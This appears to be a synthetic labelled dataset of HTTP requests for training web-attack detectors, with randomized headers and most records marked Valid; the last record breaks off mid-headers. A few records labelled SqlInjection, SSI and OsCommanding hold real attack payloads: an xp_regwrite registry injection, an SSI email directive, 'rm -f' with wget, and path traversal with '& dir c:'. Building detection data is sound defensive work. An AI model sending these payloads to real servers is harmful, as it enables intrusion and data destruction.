User-Agent: rTwn4s8Fl http://www.eeicdz.st
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: FTP/8.6 www.s7efne.png:7594, 1.9 163.85.139.46, 8.8 154.0.149.91:2804
Transfer-Encoding: ssmo
Upgrade: utq/9.8, iht/9.3, asta/6.4, eTsoh/3.0, seh/3.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahe=nwvbody&s4=nv7Nnheefthv&zcPZXDdropiK0=eTcduyenep&lOtaourslz=88360057&taiOgsutLostEae=rssrmmayjGNx&eulnaeoT=|inputna ea &lieSte0=")(targetfilter=(o=NetscapeRoot))&e2n3i=eaes&jxesttaiesnth=241

End - Id: 37679
Start - Id: 11081
class: Valid
GET /mxe/oHEm5jTAAm29ogZk/naevy/tm/3sP/ncPiJKjY5O3/pctceaeijnhET/kIimgIls5havingckTwpqMO.asp?jkgbyutoNiea=78846 HTTP/1.1
Host: www.aiqtiS.de
Connection: esmt7e
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=99
Client-ip: 214.74.209.201
Cookie: ptoztaaXtrpr=admin?updatej;iiauen0qpr=TaFtisknu6oe;Ltco=53053
Cookie2: $Version="36"
Date: Mon, 16 May 05 07:35:06 GMT
ETag: "HuunF4J5lrRhWPm-O5W"
Expect: 100-continue
From: ieonn@sehlybt.net
If-Modified-Since: Tue, 27 Apr 10 15:15:37 GMT
If-Unmodified-Since: Tue, 20 Nov 07 13:36:41 GMT
If-Match: *
If-None-Match: *
If-Range: "CioPEEvGHs6.LA6_WP0Z"
Max-Forwards: 4
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 62259-
Referer: http://www.solibss.st/ontMsaii/teavetrn.php3
TE: trailers
Trailer: Accept-Language
User-Agent: ithrfKlf0
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 948x5637
Via: HTTP/8.1 41.169.95.206
Transfer-Encoding: gzip
Upgrade: LwEo4c/2.4, leari/4.2, haaiy/0.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 881023416032
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11081
Start - Id: 26850
class: Valid
GET /seqneewedaohe/n60WZ1dVNPkV_/6XuX_gLjdlI/mkrkNgsQ0HFJGn1O.tiff?e8etoe=reoefnbu3y4kertejo&nsdietag=tn%3AjNvisystemicega HTTP/1.0
Host: www.eO0ercn.ch:80
Connection: soeah
Accept: image/*;q=0.0
Accept-Charset: koi8, x-mac-ce;q=0.5
Accept-Encoding: compress, gzip, deflate;q=0.0, identity;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 24.60.131.148
Cookie: dbI=3806;quorticoemr=09;dnodeXygrHXX=shAUb0urmsg;eojc=asrxlz9;lmsesg7wr=en;elas9l=sstveesg9zv z
Cookie2: $Version="375"
Date: Thu, 02 Feb 06 09:53:18 UTC
ETag: W/"pwygvxgH9dhSTlIzhxnl"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Mon, 26 Apr 04 17:31:22 CET
If-Unmodified-Since: Sun, 06 Jun 04 24:59:29 UTC
If-Match: *
If-None-Match: "Kl7OL_vM0L@HbWjE"
If-Range: Sat, 29 Apr 06 03:04:36 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: snxOot=omee
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: NTLM aW90ZWlha3RvcnB6bmlhcGVWdGZtZVNIdGlUOXplZ250
Range: -6214
Referer: http://m9nW.gov/RoalD.jpeg
TE: deflate,deflate,chunked
Trailer: Accept-Encoding
User-Agent: tW8vU@sA http://www.wDarnt.de
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: HTTP/3.1 www.irwt.html, dls/1.7 www.Fp3rox.html, HTTP/2.7 www.hlARchrn.css
Transfer-Encoding: li1us; t8nj5=pghd2
Upgrade: tlets/6.9, Inu/8.7, zfnnt7/5.8
Warning: 554 54.4.98.188 "zidgiksD7" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 162095
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26850
Start - Id: 41129
class: SqlInjection
GET /7X/nosaSadlnoqtiRimtti/nds6mtNi2-GyBezwk/tkF6VKIt7iau/fh-CI5m8I-/s6MkJ_NKfg.shtml?ne=1+ipassthruh&ielsytiv=exec+++xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%272oenDthqh%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&Eat7ne7dO=b%26++%24%2BEanina%3Ectm%29 HTTP/1.0
Host: www.esaLrH.st
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 225.169.58.33
Cookie: th=oni2eetPLuolbhar;hotN2o=dE9;ospCoc4=pleedelete:gtSs;oaMyseInsrJ9tit=str0oserbd
Cookie2: $Version="3"
Date: Mon, 10 Dec 07 19:01:17 GMT
ETag: ".uX4Y67YTdoeolTjxZ8x"
Expect: raanjDia
If-Modified-Since: Tue, 08 Jan 08 22:48:23 CET
If-Unmodified-Since: Sun, 11 Jan 09 12:01:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 11 Jul 06 17:35:04 CET
Max-Forwards: 5857
Pragma: no-cache
Authorization: kknwh 9eoe8nl=fNaroe
Referer: http://www.eoiras.biz/xHai/Skaorwtl/ettayeh.jpeg
Trailer: Accept-Encoding
User-Agent: san610euioab2z8deyti
UA-CPU: 68000
UA-Disp: 731,4085,32
Via: lan/5.7 5.30.78.209
Transfer-Encoding: compress
Warning: 817 www.zwnsrtsn.css "3ewnh0esrxhhAt6odael" "Wed, 28 Feb 07 06:00:38 GMT"
X-Forwarded-For: 126.131.25.164
X-Serial-Number: 042253681467
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41129
Start - Id: 28660
class: Valid
GET /e8t9sh7yrRtg5j3.js?i1difaztlnsniu=cpasswd+lib&toiuieEn4=lperldetujednliekq3ca&vmEQzo=ak6Km&oryyycgemdh=%3CctiS&efbaStttr=5063555752&tWe=lwp-jts&rpnhsesmhe=17&tl7ncxissm4hD=e31rhle6y&zzl=ndlt%2Bdbhtl8THexece&rhkaonit9a=40279707&4nhltps=aboot.inieiqdeletedrop9xo&6tp6evaljj3TJa=64 HTTP/1.1
Host: www.ryd7.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tor-mnyh1a9i, dbhcarla-ptkcotbn;q=0.7, trts-t1m3at, tD-7lwEtDof;q=0.2, pntBsnG-tnegZds;q=0.4
Cache-Control: max-stale=280
Client-ip: 123.5.16.104
Cookie: o7nh=askw|[abirmhs$b;Zeid8TLDi6e2=rRbDh2B6Wv;edAkointwO=s|nasDhr;r0ei=nH6ege3iofay
Cookie2: $Version="825"
Date: Wed, 31 Jan 07 12:01:47 UTC
ETag: W/"JRSu8eBjSuErOK0W_"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Fri, 26 Nov 04 12:39:50 GMT
If-Unmodified-Since: Sat, 13 Jan 07 01:55:01 CET
If-Match: *
If-None-Match: *
If-Range: "smV7iiN4ImtuOnq6e"
Max-Forwards: 760
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic YTV0YWFlOkJla2RpZW5o
Authorization: Basic c21zY3RtbmU6dDVhZG9hRWE=
Range: 845708-261,-74848,24170-534
Referer: /ae6xaod3/r8en/cdesroN/toeNV5ea.php4
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 1.8; 8a-de; rv:5.7.6) Gecko/22113447
UA-CPU: StrongARM
UA-Disp: 670,5224,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9872x6402
Via: HTTP/0.7 www.tnitrhon.png
Transfer-Encoding: identity
Upgrade: tsSmni/9.1
Warning: 059 www.lnimpsEi.shtml "oaE5stj9AFde" 
X-Forwarded-For: 235.50.41.146
X-Serial-Number: 6125410467694
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28660
Start - Id: 18442
class: Valid
GET /rtrtpyihNz7oeeoR/uZ/lrq75irizirnpso/Tpteee8rfapEasju.jpeg?dSVJfQ8JD=si4Cae4&mn0sawse74wesaL=neyi%7EuoEa+c&khqbsgsujes=ne&9mKKQQ0=nhhg458fa&ihe=6 HTTP/1.0
Host: 123.205.226.103
Connection: keep-alive
Accept: application/zip
Accept-Charset: x-mac-japanese, x-mac-arabic, cp-932;q=0.1, iso-8859-4;q=0.5
Accept-Encoding: identity, deflate;q=0.4, identity, compress;q=0.2
Accept-Language: *
Cache-Control: min-fresh=51
Client-ip: 129.224.27.230
Cookie: rtsAh8ittn=680736;teiakiirO4hSon=a;qJfromAn0a0g=)htwindow.openoeehi;rhxnel6s=6796;1a=eoI;Uy=382
Cookie2: $Version="3"
Date: Wed, 13 Jan 10 16:50:38 UTC
ETag: "v-EN3eDfceKAwK7tP"
Expect: 4ms5a
From: sen0esya@3Yt7.ch
If-Modified-Since: Sat, 20 Feb 10 05:48:09 CET
If-Unmodified-Since: Mon, 21 Jun 04 05:44:11 GMT
If-Match: "_x9jpy4OrzMm.8V-pEQg"
If-None-Match: "pJgRzonv@tnRh7NtM0"
If-Range: *
Max-Forwards: 030
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: umet nnh8n=onwjrt
Range: -149,-10
Referer: /sxeluw/bnSaoo.swf
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.4 (compatible; MSIE 4.6; Win98; r3mnN4ec; SboYst; inrtoh)
UA-CPU: PowerPC
UA-Disp: 3029,548,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 564x888
Via: rqa3e/5.9 www.arsoho.tiff
Transfer-Encoding: identity
Upgrade: 92nt/5.2
Warning: 665 248.249.212.194 "llab" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 18442
Start - Id: 12374
class: Valid
GET /bG4xMOZpKRH-CxCTHl/4sXJ3XWlnc/bT_ixSxkOJ0v.AJ/umLdivTbYRcC/alTtenfie8pflnsen/1I.sh? HTTP/1.0
Host: 159.154.188.239
Connection: olmO
Accept: image/gif, text/*;q=0.0, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=22910
Client-ip: 106.46.241.48
Cookie: srwrr9gniddint=84443159;utinurnt=5;ms0gu5=3227555;aftw= c;cancg7Trrio=ceaaaeliframee3tbgsound
Cookie2: $Version="226"
Date: Sat, 24 Sep 05 10:11:04 CET
ETag: W/"EkjyPSI4pPxYnYa13"
Expect: 58eo=J2ehihen;ewaeiah=i5ci13a
From: nn9ptett@eneaTr.com
If-Modified-Since: Fri, 31 Dec 04 17:32:24 CET
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Apr 08 24:50:08 UTC
Max-Forwards: 931
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: DuJm tcmeteLj=bonrctac
Authorization: yrnh Awetr=tn2v
Range: -93802
Referer: /arialse/arn1/ThuFrqu/trztqhbo/id6chsg.nsf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 9.9; ga-hd; rv:5.6.1) Gecko/45763636
UA-CPU: 68000
UA-Disp: 1831,152,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8258x863
Via: 5.6 www.3ereeeea.gif, 8.0 157.159.30.13, 7.7 82.30.184.6:35154
Transfer-Encoding: compress
Upgrade: cnml/5.7, shtng/2.0, aHtns/7.2, ylt/4.9
Warning: 340 156.131.169.61 "jayieecstibE" 
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12374
Start - Id: 13168
class: Valid
GET /Vg-iSXep4RC.css?zd0aitni=+17atzrrZscript%2B&Z5sAlj9rrsaw=3errOeoemq%25na&cafgtkl5n=2&lirOiem3grlg=l&uOdaRenidq=lc+rseoocqtadc8&bbth=%26h&yleailalrpeood=hm1E&Csyatrc=188960811&tEead=629e%40&aatciAVrwe2=ci&nol8utiSsEtann=tinph- HTTP/1.1
Host: www.GecsTu.net:80
Connection: P5ad
Accept: */*
Accept-Charset: utf-7;q=0.4, x-mac-greek;q=0.1, cp-932;q=0.0
Accept-Encoding: compress
Accept-Language: aatet-xsonof;q=0.3, ira-itbxn;q=0.6, hT-afivg
Cache-Control: raG='m'
Client-ip: 190.6.111.152
Cookie: f0eosBed7= g
Cookie2: $Version="64"
Date: Thu, 05 May 05 12:59:32 CET
ETag: "n9tR8-lMN_crbqnE"
Expect: e7ee=osmnAs
From: dToahmee@Phteaxmt0.ch
If-Modified-Since: Tue, 05 Jan 10 23:04:55 GMT
If-Unmodified-Since: Wed, 26 Oct 05 06:34:08 CET
If-Match: *
If-None-Match: "vzjjWNfEQFlgM9ElMgT"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: sanho wEnq=ivsdaa
Range: -0
Referer: http://ekuodc.fr/grtsaan/Ncene/2rbupsOs.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: r5JuQ@_3v@ http://www.idt2.gov
UA-CPU: Sparc
UA-Disp: 7860,6624,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6456x555
Via: HTTP/6.7 170.164.190.89, 5.4 www.n9aRxt.gif, 7.1 24.105.52.165
Transfer-Encoding: gzip
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 372 www.hrsEsto3.js "kerr4aeeb" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13168
Start - Id: 6154
class: Valid
PUT /atraemeeaiekvnhbe/roS/CBRNBtCqxP1rtmpL0/ho2zFmMXinclude_p/set/kygpyeBwherelqA2L/cUU8h@vC6ETj4dsFS2/s8h3E/digtkcbSoSt/is61hjHU02JRY7Gc6c/srdY@.7xlVcPI8wxD1/rs.js? HTTP/1.1
Content-Length: 144
Content-Language: ac1glers,hlhhStt,3wteh3e
Content-Encoding: gzip
Content-Location: http://www.sderodm.uk/nwlj4the/Ohuisvo/abaSdry.jsp
Content-MD5: aWxUYWVzMW9yaXRzcHFobA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 09:27:38 GMT
Last-Modified: Wed, 26 Jan 05 08:15:15 UTC
Host: www.6anb.uk:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aetu-eiotno, 6waoi-hws;q=0.4, e05i-xq, sntca-a7Diceez;q=0.4
Cache-Control: min-fresh=975
Client-ip: 193.131.23.121
Cookie: 0t29pela=iebwayPLI;SrmAFDK=8625972;tbiacsinminaU1m=1334980
Cookie2: $Version="52"
Date: Wed, 29 Oct 08 24:55:53 UTC
ETag: W/"pq7cSOmHvWLSWCvL"
Expect: ntotfl=tARTotmv
From: flmrA@xm8tEl4toi.com
If-Modified-Since: Mon, 02 Mar 09 09:43:02 UTC
If-Unmodified-Since: Tue, 09 Jun 09 23:56:55 GMT
If-Match: *
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: Fri, 02 Feb 07 10:33:56 CET
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: ettpre Oeat=7dtf2s
Range: 611533-,1458-075
Referer: /htwyEZd/osoYq/qcrnh/rmry/4rhrl.cgi
TE: deflate;q=0.2,trailers
Trailer: Accept
User-Agent: ewaeeLleatograoc2t2c
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0700x717
Via: HTTP/4.5 38.119.127.248
Transfer-Encoding: compress
Upgrade: pwlrab/6.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8flAM=eODyEaugH6Q&cpsuDPSMI=tdeSsd&oijt3t5=ocatib4&execBocKstyle=v~dl&dttsdMrnlntucnl=733&ZhkE@wLZadminjP=71&aa0Nmhpa0g=n2U&rPZZ8gZAPQ=aed&t

End - Id: 6154
Start - Id: 31110
class: Valid
GET /k4O8tbs/dyhmml.xo8/hk/q6/bQwm5/Goeea3tntlentfhnmg/eobrbgnaedeT1bt.pl?tEatPe11uj=o9ssnh+siuanAp&aamt=58344&aOsnvk4Srlee=53&eGoimg@HCSin_L=locationjdiv&nosd6li7n=2740738&N7iit=tol&to=384587&0qevuotl7edfeab=56497&eeti8gtsecec=tq&oejchrmO=evbscriptil&enLfWae=ge&6.lvbscriptUKQNZshutdown@=eVZ HTTP/1.1
Host: www.iia2.fr
Connection: close
Accept: text/xml, text/html;q=0.4, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: It-qu, 7wsatri-sedee;q=0.8
Cache-Control: no-cache
Client-ip: 25.137.114.73
Cookie: dingTsd@B7xterm=ocEFP-rmY;as=saepecsrtlO
Cookie2: $Version="63"
Date: Mon, 15 Feb 10 24:29:28 GMT
ETag: W/"INCb4aafB5vkTC5g"
Expect: 100-continue
From: y6Jyr@oaos.uk
If-Modified-Since: Fri, 30 Jun 06 18:59:57 CET
If-Unmodified-Since: Tue, 19 Dec 06 12:25:11 UTC
If-Match: "MGD@cdaUWLm7vOPl"
If-None-Match: "HSUqOLO@_MY.xw5Qk"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Basic ZTUxZTpycnJBcw==
Range: -245173,089218-6894
Referer: http://laleh.fr/inoIl.txt
TE: chunked,gzip,deflate;q=0.2
Trailer: TE
User-Agent: Mozilla/4.3 (compatible; Konqueror/8.2; Open BSD i586; 8sr7ee; 6yHh2n; cEhxtEal)
UA-CPU: MIPS
UA-Disp: 195,195,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1573x3760
Via: 6.6 51.140.12.135:286
Transfer-Encoding: compress
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 311 221.48.91.250:29839 "hOdjuaaVchtteasa" "Thu, 31 Jan 08 03:52:06 UTC"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31110
Start - Id: 39393
class: SSI
GET /betweenEr.htm?oaosv=oaexecew+%5Cehv&fromconnectwget8n=%3C%21--%23email+fromhost%3D%22www.nsitstic.com%22+tohost%3D%22mailbox.sb2b.com%22+message%3D%22Seagh+s5oeig+34dwxe+ghii%22+fromaddress%3D%22reipo.com%22+toaddress%3D%221neA.aHih.com%22+subject%3D%22a%22+sender%3D%22keoZ.com%22+replyto%3D%22s3mLen.com%22+cc%3D%22h8o%22+inreplyto%3D%22oy+eee+e%22+id%3D%22e4mail%22+--%3E&etsialah2asuo=c&BqxZM.6W8Ctmp6=9lw4%40p7TwN&ogetih=8933787 HTTP/1.1
Host: www.ncsnso6wWe.uk
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.6, compress;q=0.8
Accept-Language: h-s, a4r8ua-q6a;q=0.8
Cache-Control: no-transform
Client-ip: 247.66.9.211
Cookie: asbcdRosmh2jioI=<n;GdnuroRyo=IaaEict;r53=Seo
Cookie2: $Version="42"
Date: Mon, 14 Mar 05 11:30:34 UTC
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: 2taerbd@7tinee5s.fr
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Thu, 19 Oct 06 03:47:29 CET
If-Match: *
If-None-Match: "fa6XV9CS8EvXvXVfe6c"
If-Range: Thu, 28 Dec 06 06:33:16 UTC
Max-Forwards: 0523
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: http://www.eiuoaaeX.net/ao2j/nTshsxt/aoltdene/sqole3h/eeeaxomn.bin
TE: chunked;q=0.8,deflate,deflate;q=0.7
Trailer: Accept
User-Agent: tFL4BLC1 http://www.tou28.gov
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 0.2 124.162.206.142, 8te/4.0 www.to9hhxn.shtml, 8.2 www.ei5nemn.shtml
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 931 191.117.0.135:8 "o2emeai5i" "Wed, 18 Nov 09 03:55:48 GMT"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39393
Start - Id: 23416
class: Valid
GET /BYKnbetweenc/rU4IEkQE/o-zQVcTCxy4Sf2YnH/eSndI6Dz3h_pZB06/rsisl/HIavaoeo1cnhrefab/trsTohl6honen56/eyno954msvonEiarsm.jsp?rlt=eotwzttt&KF3tAjEpt=rdleoac3Eqi&eiaifp=e3w HTTP/1.1
Host: 64.165.112.243
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: cpmoin-hung;q=0.3, h-xnze, tvo-s, ngn-0rPaee
Cache-Control: no-store
Client-ip: 82.77.161.74
Cookie: y9iSbwLrioye=77;7lnente=555;snudNludnSazeri=pisnA
Cookie2: $Version="832"
Date: Thu, 24 Mar 05 01:15:48 UTC
ETag: "4GlJvF0PI@Dj9YXMxhp"
Expect: nEeit
From: i1ejual@Eudncoe.st
If-Modified-Since: Thu, 08 Oct 09 24:33:17 GMT
If-Unmodified-Since: Mon, 21 Feb 05 11:39:34 CET
If-Match: "DmLYZ02MIu0goqrId"
If-None-Match: *
If-Range: Thu, 26 May 05 03:54:01 GMT
Max-Forwards: 3
MIME-Version: 5.5
Pragma: A=eyaposp
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: NTLM QWVpZThzbGF5cnJzMHJyMWVIcmZvcjNDNHVndW50NHNlYWRh
Range: -14180
Referer: /drps.rar
TE: trailers,trailers,deflate;q=0.7
Trailer: Referer
User-Agent: Mozilla/3.4 (X11; U; Solaris 6.0; ss-ia; rv:2.6.3) Gecko/71203385
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 134x126
Via: 3.6 www.QrarsrE.jpg, teeT/0.0 www.htcr6sis.shtml, 7.2 www.NatRt.tiff
Transfer-Encoding: mwem9
Upgrade: kesgoe/3.7, tce9/6.9, aee0w/7.2, iyu/0.2
Warning: 969 190.205.124.28:1921 "Alhersnix9ottat" 
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 15233843
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23416
Start - Id: 29667
class: Valid
GET /bO6Ngfo4nykr3XFYKsC/t3glSaplZ31u/as0hlaou/ZRKBYndivnhYC./aIGJRoJJBAQJ-k/tenhen7Uessoetotsa/bdreco/oEdhsht/bO6LTXvYN/sgCTtIGmNzbZzDoWaGw/tdtaeeqlTe.tiff? HTTP/1.1
Host: 41.215.167.56
Connection: ha8oh
Accept: */*;q=0.4
Accept-Charset: macintosh, x-mac-hebrew;q=0.6, windows-1252;q=0.0, euc-tw
Accept-Encoding: compress;q=0.3, identity, compress;q=0.5
Accept-Language: e-wB;q=0.7, nEvrsi-Eoigre
Cache-Control: max-stale=927
Client-ip: 253.106.46.66
Cookie: eor6iaIb=ddg;i33=126785685;8frddrorRse8fk=04
Cookie2: $Version="373"
Date: Tue, 26 Jun 07 09:48:08 GMT
ETag: "mHQJRk23s-H9cHk"
Expect: esiee
From: eIlshEtf@Tacrr5ule6.org
If-Modified-Since: Sat, 02 May 09 06:14:31 GMT
If-Unmodified-Since: Mon, 31 Oct 05 04:24:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Aug 06 17:11:24 GMT
Max-Forwards: 37
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic Z3dvbG5JdzpUaWxzRHQ=
Range: 0-345
Referer: http://www.46ibs4e.de/kSnp/ell00mie/irisn/ygnrune/Asrwoon.asp
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (compatible; Konqueror/9.6; Linux i386; zsig; 1ue1trbr; rdiweobg)
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8055x615
Via: 3.1 166.37.38.51, HTTP/5.2 204.37.221.139, sHOto/3.0 35.55.252.166
Transfer-Encoding: t88Ar
Upgrade: awt/8.5, eibur/5.0, I6to/2.0, ghte/2.0, o2t/2.2
Warning: 322 9.218.91.57 "Efrfs" "Mon, 12 May 08 03:38:33 UTC"
X-Forwarded-For: 207.227.126.195
X-Serial-Number: 149051815209
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29667
Start - Id: 43142
class: OsCommanding
GET /iBN26Zdy1SSl/v7O4betweenDU4/ri/lXijckGQf1SX/tv/aaeSkitaut/8zI8QbGC9UG/TcdRpfRreEs/s6WjwjN9Ny_zC/tre0XEt_1zouhJPT.j/3seitftdruoInInGcp.css?eeuyab08mqbe=rm+-f+++%2Ftmp%2FeR++%7C&AKreplaceGTlSbQ=umqHOJ&wmphttlisrewOcr=6bcd&rdgNhdtefszl=3097518&wbauUgn5g5rc4pp=rtig&iO=bo5r-d&Sastppm=access_logrrHn%3Fnnvtziaa+puwget&oetdhJo=o%7Cs6mrur2f&dtt=S HTTP/1.0
Host: 198.135.198.101:80
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic
Accept-Encoding: deflate;q=0.8, compress;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 203.26.22.181
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Wed, 25 Apr 07 23:08:33 CET
ETag: "xp7WlUFTEtl@0cqPOnSz"
Expect: riuusi2e=neiyivtb
From: ennl@eGwctOCzc.fr
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: *
If-None-Match: *
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 5352
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: NTLM cjJpZXV0bWduZWFzdHJ6dWlycmlpamR0NXRkcm9kbjBqbG56bms=
Range: 46359-,93372-15,76-
Referer: /dcnaotTl/nhetsAA.swf
TE: trailers,trailers
Trailer: Expect
User-Agent: OpP9o/5.4
UA-CPU: Sparc
UA-Disp: 391,012,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x046
Via: 5.1 www.urRHxa.png
Transfer-Encoding: identity
Upgrade: sloat/8.4
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43142
Start - Id: 43979
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.n7Rsht.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, gzip, identity;q=0.4, identity, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.18.187.245
Cookie: fvpoqEtsiueneUu=whered;tw8oweoscmo=aa5zuweiy1-oV;eaxGusbb4etreS=icsmg5dDU02
Cookie2: $Version="378"
Date: Thu, 15 Dec 05 18:24:43 CET
ETag: W/".M73M1s.vEWh-qdTs"
